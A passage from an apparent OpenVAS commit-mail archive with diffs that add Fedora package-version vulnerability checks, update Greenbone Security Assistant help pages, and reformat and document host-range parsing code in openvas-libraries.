get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "FC12") +{ + + if(isrpmvuln(pkg:"cacti", rpm:"cacti~0.8.7e~3.fc12", rls:"FC12")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2009_12560_cacti_fc12.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_13157_automake_fc12.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_13157_automake_fc12.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_13157_automake_fc12.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for automake FEDORA-2009-13157 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861612); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-13157"); + script_cve_id("CVE-2009-4029"); + script_name("Fedora Update for automake FEDORA-2009-13157"); + desc = " + + Vulnerability Insight: + Automake is a tool for automatically generating `Makefile.in' + files compliant with the GNU Coding Standards. + + You should install Automake if you are developing software and would + like to use its ability to automatically generate GNU standard + Makefiles. If you install Automake, you will also need to install + GNU's Autoconf package. + + + Affected Software/OS: + automake on Fedora 12 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00012.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of automake"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "FC12") +{ + + if(isrpmvuln(pkg:"automake", rpm:"automake~1.11.1~1.fc12", rls:"FC12")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2009_13157_automake_fc12.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_13539_krb5_fc12.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_13539_krb5_fc12.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_13539_krb5_fc12.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,81 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for krb5 FEDORA-2009-13539 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861606); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-13539"); + script_cve_id("CVE-2009-3295"); + script_name("Fedora Update for krb5 FEDORA-2009-13539"); + desc = " + + Vulnerability Insight: + Kerberos V5 is a trusted-third-party network authentication system, + which can improve your network's security by eliminating the insecure + practice of cleartext passwords. + + + Affected Software/OS: + krb5 on Fedora 12 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00200.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of krb5"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "FC12") +{ + + if(isrpmvuln(pkg:"krb5", rpm:"krb5~1.7~15.fc12", rls:"FC12")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2009_13539_krb5_fc12.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_13551_slim_fc11.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_13551_slim_fc11.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_13551_slim_fc11.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for slim FEDORA-2009-13551 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861602); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-13551"); + script_cve_id("CVE-2009-1756"); + script_name("Fedora Update for slim FEDORA-2009-13551"); + desc = " + + Vulnerability Insight: + SLiM (Simple Login Manager) is a graphical login manager for X11. + It aims to be simple, fast and independent from the various + desktop environments. + SLiM is based on latest stable release of Login.app by Per Lid?n. + + In the distribution, slim may be called through a wrapper, slim-dynwm, + which determines the available window managers using the freedesktop + information and modifies the slim configuration file accordingly, + before launching slim. + + + Affected Software/OS: + slim on Fedora 11 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00000.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of slim"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "FC11") +{ + + if(isrpmvuln(pkg:"slim", rpm:"slim~1.3.1~9.fc11", rls:"FC11")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2009_13551_slim_fc11.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_13552_slim_fc12.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_13552_slim_fc12.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_13552_slim_fc12.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for slim FEDORA-2009-13552 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861605); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-13552"); + script_cve_id("CVE-2009-1756"); + script_name("Fedora Update for slim FEDORA-2009-13552"); + desc = " + + Vulnerability Insight: + SLiM (Simple Login Manager) is a graphical login manager for X11. + It aims to be simple, fast and independent from the various + desktop environments. + SLiM is based on latest stable release of Login.app by Per Lid?n. + + In the distribution, slim may be called through a wrapper, slim-dynwm, + which determines the available window managers using the freedesktop + information and modifies the slim configuration file accordingly, + before launching slim. + + + Affected Software/OS: + slim on Fedora 12 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00009.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of slim"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "FC12") +{ + + if(isrpmvuln(pkg:"slim", rpm:"slim~1.3.1~9.fc12", rls:"FC12")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2009_13552_slim_fc12.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_13642_NetworkManager_fc11.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_13642_NetworkManager_fc11.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_13642_NetworkManager_fc11.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,84 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for NetworkManager FEDORA-2009-13642 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861604); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-13642"); + script_cve_id("CVE-2009-4145", "CVE-2009-4144"); + script_name("Fedora Update for NetworkManager FEDORA-2009-13642"); + desc = " + + Vulnerability Insight: + NetworkManager attempts to keep an active network connection available at all + times. It is intended only for the desktop use-case, and is not intended for + usage on servers. The point of NetworkManager is to make networking + configuration and setup as painless and automatic as possible. If using DHCP, + NetworkManager is _intended_ to replace default routes, obtain IP addresses + from a DHCP server, and change nameservers whenever it sees fit. + + + Affected Software/OS: + NetworkManager on Fedora 11 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00122.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of NetworkManager"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(r
            Name
            Event @@ -1839,11 +1843,11 @@
            Method - +
            Email @@ -3639,8 +3643,10 @@ - - Name of new config is ''. + + + Name of new config is ''. + From scm-commit at wald.intevation.org Mon Jan 11 08:09:27 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 08:09:27 +0100 (CET) Subject: [Openvas-commits] r6357 - in trunk/gsa: . src/html/src/help Message-ID: <20100111070927.D4D3986607AF@pyrosoma.intevation.org> Author: jan Date: 2010-01-11 08:09:26 +0100 (Mon, 11 Jan 2010) New Revision: 6357 Added: trunk/gsa/src/html/src/help/scanconfig_editor.htm4 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/configure_escalators.htm4 trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 trunk/gsa/src/html/src/help/contents.htm4 trunk/gsa/src/html/src/help/tasks.htm4 Log: Updating help. * src/html/src/help/tasks.htm4: Added section on auto-refresh. * src/html/src/help/contents.htm4: Added more link. Ordered according to user interface. * src/html/src/help/configure_scanconfigs.htm4: Fixed links. * src/html/src/help/scanconfig_editor.htm4: New. * src/html/src/help/configure_escalators.htm4: Added section on test escalator. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-09 20:55:28 UTC (rev 6356) +++ trunk/gsa/ChangeLog 2010-01-11 07:09:26 UTC (rev 6357) @@ -1,3 +1,19 @@ +2010-01-11 Jan-Oliver Wagner + + Updating help. + + * src/html/src/help/tasks.htm4: Added section on auto-refresh. + + * src/html/src/help/contents.htm4: Added more link. + Ordered according to user interface. + + * src/html/src/help/configure_scanconfigs.htm4: Fixed links. + + * src/html/src/help/scanconfig_editor.htm4: New. + + * src/html/src/help/configure_escalators.htm4: Added section + on test escalator. + 2010-01-09 Matthew Mundell * src/html/src/gsa-style.css (small_inline_form): New style. Modified: trunk/gsa/src/html/src/help/configure_escalators.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_escalators.htm4 2010-01-09 20:55:28 UTC (rev 6356) +++ trunk/gsa/src/html/src/help/configure_escalators.htm4 2010-01-11 07:09:26 UTC (rev 6357) @@ -121,4 +121,13 @@ Details.

            +

            Test Escalator

            + +

            +By clicking on the start icon +Test Escalator +the corresponding escalator is immediately executed with some +dummy data. +

            + m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 2010-01-09 20:55:28 UTC (rev 6356) +++ trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 2010-01-11 07:09:26 UTC (rev 6357) @@ -151,7 +151,8 @@

            Issueing the details icon Scan Config Details -will open the Scan Config Details dialog to provide details on the configuration +will open the Scan Config Details +dialog to provide details on the configuration such as the selected NVTs and applied settings.

            @@ -161,7 +162,8 @@ A Scan Config can be modified if it is not currently in use by a task. A click on the edit icon Edit -will open the Scan Config Details dialog with details on the configuration +will open the Scan Config Editor dialog +with details on the configuration such as the selected NVTs and applied settings and allow modifications of it. If the Scan Config is currently in use by a task, the icon will appear greyed out Editing not possible. Modified: trunk/gsa/src/html/src/help/contents.htm4 =================================================================== --- trunk/gsa/src/html/src/help/contents.htm4 2010-01-09 20:55:28 UTC (rev 6356) +++ trunk/gsa/src/html/src/help/contents.htm4 2010-01-11 07:09:26 UTC (rev 6357) @@ -14,15 +14,18 @@
            • Scan Management
            • Configuration
                • +
              • Configure Scan Configs
                • +
              • Scan Config Details
                • +
              • Scan Config Editor
              • Configure Targets
                • -
              • Configure Scan Configs
              • Configure Credentials
              • Configure Agents
              • Configure Escalators
                • Added: trunk/gsa/src/html/src/help/scanconfig_editor.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-09 20:55:28 UTC (rev 6356) +++ trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-11 07:09:26 UTC (rev 6357) @@ -0,0 +1,10 @@ +m4_define(`PAGE_TITLE', `Help: Scan Config Editor') +m4_include(`header.m4') + +
                + +

                Scan Config Editor

                + + +m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/help/tasks.htm4 =================================================================== --- trunk/gsa/src/html/src/help/tasks.htm4 2010-01-09 20:55:28 UTC (rev 6356) +++ trunk/gsa/src/html/src/help/tasks.htm4 2010-01-11 07:09:26 UTC (rev 6357) @@ -220,6 +220,21 @@ The icon of the current choice will appear greyed out Current sort ascending, Current sort descending. The list will be updated immediately. + +

                Auto-refresh

                + +

                +The tasks overview allows to set a time interval for +an automatic page refresh. Select one of the +intervals (10 seconds, 30 seconds or 60 seconds) +and confirm with pressing the refresh +Refresh icon. +

                + +

                +Note that leaving this page will reset the refresh interval to manual refresh. +

                +

                Actions

                From scm-commit at wald.intevation.org Mon Jan 11 09:32:38 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 09:32:38 +0100 (CET) Subject: [Openvas-commits] r6358 - in trunk/openvas-libraries: . hg Message-ID: <20100111083238.B82E3861F2C8@pyrosoma.intevation.org> Author: felix Date: 2010-01-11 09:32:36 +0100 (Mon, 11 Jan 2010) New Revision: 6358 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/hg/hg_add_hosts.c trunk/openvas-libraries/hg/hg_dns_axfr.c trunk/openvas-libraries/hg/hg_subnet.c Log: * hg/hg_add_hosts.c, hg/hg_dns_axfr.c, hg/hg_subnet.c: Reformatting, * doc and todos added. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-11 07:09:26 UTC (rev 6357) +++ trunk/openvas-libraries/ChangeLog 2010-01-11 08:32:36 UTC (rev 6358) @@ -1,3 +1,8 @@ +2010-01-11 Felix Wolfsteller + + * hg/hg_add_hosts.c, hg/hg_dns_axfr.c, hg/hg_subnet.c: Reformatting, + * doc and todos added. + 2010-01-08 Felix Wolfsteller * hg/hg_add_hosts.c (getaddrfamily, real_ip, range, hg_add_host) Modified: trunk/openvas-libraries/hg/hg_add_hosts.c =================================================================== --- trunk/openvas-libraries/hg/hg_add_hosts.c 2010-01-11 07:09:26 UTC (rev 6357) +++ trunk/openvas-libraries/hg/hg_add_hosts.c 2010-01-11 08:32:36 UTC (rev 6358) @@ -41,9 +41,9 @@ * or '[xx|xx-xx].[xx|xx-xx].[xx|xx-xx].[xx|xx-xx]' (by Alex Butcher, Articon-Integralis AG) */ /** @TODO Document what kind of input for ipv6 adresses is acceppted, move - * description of valid "hostnames" to a better place (this is really - * interesting for a user), document how to list multiple hosts (space, - * comma, semicolon- separated?). + * description of valid "hostnames" to a better place (this is really + * interesting for a user), document how to list multiple hosts (space, + * comma, semicolon- separated?). */ #define OCTETRANGE "%3d%*1[-]%3d" @@ -105,59 +105,69 @@ return 0; } +/** + * @brief From a string representation of an ips octet range (like 2-10) + * @brief retrieves start (like 2) and end (10) of the range. Works with single + * @brief numbers, too. + * + * @param[in] data Input string (like "2-13", "22-1"). Can also be a single + * number. Numbers have been between 0 and 255. + * @param[out] s On successfull exit, contains start of range. + * @param[out] e On successfull exit, contains end of range. + * + * @return 0 on success, -1 if input is not a valid range. + */ static int range (char* data, int* s, int* e) { int convs; int first, last; - convs=sscanf(data, OCTETRANGE, &first, &last); + convs = sscanf (data, OCTETRANGE, &first, &last); if (convs != 2) - { - /* it didn't work out, so we try converting it as - an OCTET (xxx) */ - convs=sscanf(data, OCTET, &first); - if (convs != 1) { - /* that didn't work out either, so it's not a range */ - return (-1); + /* It didn't work out, so we try converting it as an OCTET (xxx). */ + convs = sscanf (data, OCTET, &first); + if (convs != 1) + { + /* That didn't work out either, so it's not a range. */ + return (-1); + } + else + { + /* We'll use these as loop ranges later. */ + last = first; + } } - else + + if ((first < 0) || (first > 255) || (last < 0 ) || (last > 255)) + return (-1); + + if (first > last) { - /* we'll use these as loop ranges later */ - last = first; + /* Swap the two vars. */ + first ^= last; + last ^= first; + first ^= last; } - } - if((first < 0) || (first > 255) || - (last < 0 ) || (last > 255)) - return (-1); - - if(first > last) - { - /* swap the two vars */ - first ^= last; - last ^= first; - first ^= last; - } - - if(s)*s = first; - if(e)*e = last; + if (s) *s = first; + if (e) *e = last; return 0; } static int -netmask_to_cidr_netmask(struct in_addr nm) +netmask_to_cidr_netmask (struct in_addr nm) { - int ret = 32; + int ret = 32; - nm.s_addr = ntohl(nm.s_addr); - while(!(nm.s_addr & 1)) - { - ret--; - nm.s_addr >>=1; - } - return ret; + nm.s_addr = ntohl (nm.s_addr); + while (!(nm.s_addr & 1)) + { + ret--; + nm.s_addr >>=1; + } + return ret; } /** @@ -165,6 +175,8 @@ * * @param[in,out] globals Pointer to hg_globals struct to add hosts to. * @param[in] hostname String describing host(s) to add. + * + * @TODO verify @return 0 if successfull, -1 otherwise? */ int hg_add_host (struct hg_globals * globals, char* hostname) @@ -191,63 +203,64 @@ *comp1 = *comp2 = *comp3 = *comp4 = '\0'; + // Dealing with ranges t = strchr (hostname, '-'); if (t != NULL) - { - struct in_addr ip; - t[0] = '\0'; - // If string describing a host could not be transformed to an in_addr - // or does not contain three dots. - if ((inet_aton (hostname, &ip) == 0) || !real_ip (hostname)) - { - t[0] = '-'; - goto next; - } - - if (real_ip (hostname) && real_ip (&(t[1]))) { - struct in_addr start, end; - struct in6_addr start6, end6; + struct in_addr ip; + t[0] = '\0'; + // If string describing a host could not be transformed to an in_addr + // or does not contain three dots. + if ((inet_aton (hostname, &ip) == 0) || !real_ip (hostname)) + { + t[0] = '-'; + goto next; + } - hg_resolv (hostname, &start6, AF_INET); - hg_resolv (&(t[1]), &end6, AF_INET); - start.s_addr = start6.s6_addr32[3]; - end.s_addr = end6.s6_addr32[3]; + if (real_ip (hostname) && real_ip (&(t[1]))) + { + struct in_addr start, end; + struct in6_addr start6, end6; - if (globals->flags & HG_DISTRIBUTE) - { - int jump; - unsigned long diff; - int i, j; + hg_resolv (hostname, &start6, AF_INET); + hg_resolv (&(t[1]), &end6, AF_INET); + start.s_addr = start6.s6_addr32[3]; + end.s_addr = end6.s6_addr32[3]; - diff = ntohl(end.s_addr) - ntohl(start.s_addr); - if ( diff > 255 ) jump = 255; - else if ( diff > 128 ) jump = 10; - else jump = 1; + if (globals->flags & HG_DISTRIBUTE) + { + int jump; + unsigned long diff; + int i, j; - for (j = 0 ; j < jump ; j ++) - { - for (i = j ; i <= diff ; i += jump) - { - struct in_addr ia; - ia.s_addr = htonl (ntohl (start.s_addr) + i); - if (ntohl(ia.s_addr) > ntohl(end.s_addr)) - break; + diff = ntohl(end.s_addr) - ntohl(start.s_addr); + if ( diff > 255 ) jump = 255; + else if ( diff > 128 ) jump = 10; + else jump = 1; - hg_add_host_with_options (globals, inet_ntoa (ia), ia, 1, 32, 1, &ia); - } + for (j = 0 ; j < jump ; j ++) + { + for (i = j ; i <= diff ; i += jump) + { + struct in_addr ia; + ia.s_addr = htonl (ntohl (start.s_addr) + i); + if (ntohl (ia.s_addr) > ntohl (end.s_addr)) + break; + + hg_add_host_with_options (globals, inet_ntoa (ia), ia, 1, 32, 1, &ia); + } + } + } + else + hg_add_host_with_options (globals, inet_ntoa (start), start, 1, 32, 1, &end); + return 0; } - } - else - hg_add_host_with_options (globals, inet_ntoa (start), start, 1, 32, 1, &end); - return 0; + t[0] = '-'; } - t[0] = '-'; - } next: - reminder = malloc (strlen(hostname)); + reminder = malloc (strlen (hostname)); // Hostname wrapped by singe quotes ('')? if ((hostname[0] == '\'') && @@ -272,40 +285,40 @@ skip all this */ /* Try to convert components as OCTETRANGE (xxx-xxx). */ - if (range(comp1, &o1first, &o1last) || - range(comp2, &o2first, &o2last) || - range(comp3, &o3first, &o3last) || - range(comp4, &o4first, &o4last)) + if (range (comp1, &o1first, &o1last) || + range (comp2, &o2first, &o2last) || + range (comp3, &o3first, &o3last) || + range (comp4, &o4first, &o4last)) goto noranges; /* Generate and add the range. */ for (o1 = o1first; o1 <= o1last; o1++) - { - for (o2 = o2first; o2 <= o2last; o2++) { - for (o3 = o3first; o3 <= o3last; o3++) - { - for (o4 = o4first; o4 <= o4last; o4++) + for (o2 = o2first; o2 <= o2last; o2++) { - snprintf (rangehost, 17, "%d.%d.%d.%d", o1, o2, o3, o4); - hg_resolv (rangehost, &ip6, AF_INET); - ip.s_addr = ip6.s6_addr32[3]; - if (ip.s_addr != INADDR_NONE) + for (o3 = o3first; o3 <= o3last; o3++) { - hg_add_host_with_options (globals, rangehost, ip, 0, 32, 0, NULL); + for (o4 = o4first; o4 <= o4last; o4++) + { + snprintf (rangehost, 17, "%d.%d.%d.%d", o1, o2, o3, o4); + hg_resolv (rangehost, &ip6, AF_INET); + ip.s_addr = ip6.s6_addr32[3]; + if (ip.s_addr != INADDR_NONE) + { + hg_add_host_with_options (globals, rangehost, ip, 0, 32, 0, NULL); + } + } } } - } } - } return 0; noranges: if (unquote) { copy = malloc (strlen (hostname) - 1); - strncpy (copy, &(hostname[1]), strlen(&(hostname[1])) - 1); + strncpy (copy, &(hostname[1]), strlen (&(hostname[1])) - 1); } else { @@ -320,16 +333,18 @@ if (t) { t[0] = '\0'; - if ((atoi(t+1) > 32) && inet_aton (t+1, &nm)) - { - cidr_netmask = netmask_to_cidr_netmask (nm); - } + if ((atoi (t+1) > 32) && inet_aton (t+1, &nm)) + { + cidr_netmask = netmask_to_cidr_netmask (nm); + } else cidr_netmask = atoi (t+1); if ((cidr_netmask < 1) || (cidr_netmask > 32)) cidr_netmask = 32; } ip.s_addr = INADDR_NONE; + + // Use only string between braces ([192.168.32.1]). q = strchr (hostname, '['); if (q != NULL) @@ -344,58 +359,60 @@ q[0] = '\0'; } } + if (ip.s_addr == INADDR_NONE) { hg_resolv (hostname, &ip6, AF_INET6); ip.s_addr = ip6.s6_addr32[3]; } + if (!IN6_ARE_ADDR_EQUAL (&ip6, &in6addr_any) && IN6_IS_ADDR_V4MAPPED (&ip6)) - { - if (cidr_netmask == 32) { - hg_add_host_with_options (globals, hostname, ip, 0, cidr_netmask, 0, NULL); - } - else - { - struct in_addr first = cidr_get_first_ip (ip, cidr_netmask); - struct in_addr last = cidr_get_last_ip (ip, cidr_netmask); + if (cidr_netmask == 32) + { + hg_add_host_with_options (globals, hostname, ip, 0, cidr_netmask, 0, NULL); + } + else + { + struct in_addr first = cidr_get_first_ip (ip, cidr_netmask); + struct in_addr last = cidr_get_last_ip (ip, cidr_netmask); - if ((globals->flags & HG_DISTRIBUTE) != 0 && cidr_netmask <= 29) - { - struct in_addr c_end; - struct in_addr c_start; - struct in6_addr c_start6; - int addition; + if ((globals->flags & HG_DISTRIBUTE) != 0 && cidr_netmask <= 29) + { + struct in_addr c_end; + struct in_addr c_start; + struct in6_addr c_start6; + int addition; - if ( cidr_netmask <= 21 ) addition = 8; - else if ( cidr_netmask <= 24 ) addition = 5; - else addition = 2; + if (cidr_netmask <= 21) addition = 8; + else if (cidr_netmask <= 24) addition = 5; + else addition = 2; - c_start = first; - c_end = cidr_get_last_ip(c_start, cidr_netmask + addition); + c_start = first; + c_end = cidr_get_last_ip (c_start, cidr_netmask + addition); - for (;;) - { - int dobreak = 0; + for (;;) + { + int dobreak = 0; - if (ntohl (c_end.s_addr) >= ntohl (last.s_addr)) - dobreak++; - hg_get_name_from_ip (&c_start6, hostname, sizeof (hostname)); + if (ntohl (c_end.s_addr) >= ntohl (last.s_addr)) + dobreak = 1; - c_start.s_addr = c_start6.s6_addr32[3]; - hg_add_host_with_options (globals, strdup(hostname), - c_start, 1, 32, 1, - &c_end); - c_start.s_addr = htonl (ntohl(c_end.s_addr) + 2); - c_end = cidr_get_last_ip (c_start, cidr_netmask + addition); - c_start.s_addr = htonl (ntohl (c_start.s_addr) - 1); + hg_get_name_from_ip (&c_start6, hostname, sizeof (hostname)); - if (dobreak) break; + c_start.s_addr = c_start6.s6_addr32[3]; + hg_add_host_with_options (globals, strdup (hostname), + c_start, 1, 32, 1, &c_end); + c_start.s_addr = htonl (ntohl (c_end.s_addr) + 2); + c_end = cidr_get_last_ip (c_start, cidr_netmask + addition); + c_start.s_addr = htonl (ntohl (c_start.s_addr) - 1); + + if (dobreak == 1) break; + } + } + else hg_add_host_with_options (globals, hostname, first, 1, 32, 1, &last); } - } - else hg_add_host_with_options (globals, hostname, first, 1, 32, 1, &last); } - } else if (!IN6_ARE_ADDR_EQUAL (&ip6, &in6addr_any)) { hg_add_ipv6host_with_options (globals, hostname, &ip6, 0, 128, 0, &ip6); @@ -416,10 +433,20 @@ * * host1/nm,host2/nm,xxx.xxx.xxx.xxx/xxx, .... * + * , progressing the "marker" of the globals argument. + * Hosts can be separated by comma or semicolons. + * + * @param[in,out] globals hg_globals to add hosts to. + * @param[in] limit Maximum number of hosts to resolve, might well break + * before. Smaller or equal to 0 means "no limit". + * + * @return 0 if all or \ref limit hosts have been added, -1 on errors. */ int hg_add_comma_delimited_hosts (struct hg_globals* globals, int limit) { + // p will point to position in string where currently looked at host starts, + // v to the (temporary) end of the string. char * p, 